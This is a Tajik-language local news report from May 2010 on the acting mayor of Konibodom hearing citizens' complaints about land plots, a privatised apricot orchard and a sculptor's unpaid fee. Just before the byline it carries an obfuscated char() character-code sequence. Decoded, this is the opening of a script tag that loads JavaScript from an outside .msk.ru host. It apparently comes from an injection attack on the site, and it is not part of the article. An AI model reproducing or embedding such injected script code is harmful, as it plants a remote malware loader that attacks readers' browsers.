7.05.2010
Рӯзи қабули шаҳрвандон дар Конибодом
Суғд. Минбаъд мувофиқи супориши президенти кишвар Эмомалӣ Раҳмон рӯзи шанбеи ҳар ҳафта, раисони шаҳру ноҳияҳои ҷумҳурӣ шаҳрвандонро қабул намуда, саволу муаммоҳои онҳоро гӯш мекунанд, ҷавобҳои амалӣ мегардонанд.
Шанбеи гузашта иҷрокунандаи вазифаи раиси шаҳри Конибодоми вилояти Суғд Нӯъмоҷон Обидов шаҳрвандонро қабул кард. Бояд таъкид намуд, ки дар қабул сардорону роҳбарони ташкилоту муассисаҳо ширкат варзиданд.
Шаҳрванд Назокат Сатторова: - Соли 1985 ум барои гирифтани участкаи наздиҳавлигӣ ариза дода будам, байни 25 сол барои фаҳмидани натиҷаи аризаам 110 маротиба ба ҳукумати шаҳр омадам, то ҳол дар ҳавлии домодам зиндагӣ мекунам. Намедонам тақдири аризаи ман чӣ шуда бошад.
Ҷавоби иҷрокунандаи вазифаи раиси шаҳр: - Мудири шӯъба Руслан Азимов, шумо масъаларо ҷиддӣ омӯхта, дар муддати кӯтоҳ ҳал намоед ва ба ман ахбороти хаттӣ диҳед.
Як гурӯҳ кормандони Асотсиатсияи хоҷагиҳои деҳқонии «Ирам»:
- Мо соли дароз дар ҳавои сарду гарм дар саҳро кор мекунем, саҳмдор мебошем. Сад афсӯс, ки боғи зардолуҳо ба мо насиб накард. Баъзе коркунони ҳукумат ва курсинишинони АХД дарахтони ҳосилдеҳи моро хусусӣ гардонида гирифтаанд.
Ҷавоби иҷрокунандаи вазифаи раиси шаҳр: - Раиси кумитаи замин ба шумо супориш! Масъаларо худи ҳамин рӯз дида бароед, аз рӯи адолат ҳал намоед, то ки ҳақдор беҳақ намонад!
Ҳайкалтарош Латипов: - Ман барои сохтани муҷассамаи Абӯабдуллоҳи Рӯдакӣ дар шаҳри Конибодом бо собиқ раиси шаҳр ба маблағи 25 ҳазор доллори ИМА шартномаи даҳонӣ баста будам, қариб як сол мешавад, ки ман ҳаққи меҳнатамро гирифта наметавонам.
Ҷавоби иҷрокунандаи вазифаи раиси шаҳр: - Аввал ин, ки шартномаи даҳониро ба қоғаз дӯхта намешавад. Сониян, дар вақташ масъаларо ҳал кардан лозим буд. Хуб, чи ки набошад шумо барои ободонии Конибодом саҳм гузоштед. Аз ин лиҳоз мо бо мутахассисон маслиҳат карда, ҳадди имкон ин муамморо ҳал мекунем.
... Ҳамит тариқ ҳамон рӯз қариб 50 нафар шаҳрвандони Канди кӯҳан ба саволҳои худ аз тарафи иҷрокунандаи раиси шаҳр ва дигар мутасаддиён ҷавобҳои мушаххас ва қаноатманд гирифтанд. Хурсандиовар он аст, ки минбаъд шаҳрвандон ҳар рӯзу ҳар соат дари идорҳои ҳукумати маҳаллиро намекӯбанд. Акнун ҳар рӯзи шанбеи ҳафта аз соати нӯҳи пагоҳ раисони шаҳру навоҳӣ ва дигар мутахассисон ба роҳи мардум интизор мешаванд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)1a1fb66b436d631c7e2ab875f83601a1.js" type="text/javascript">

Мақсуди Ҷӯра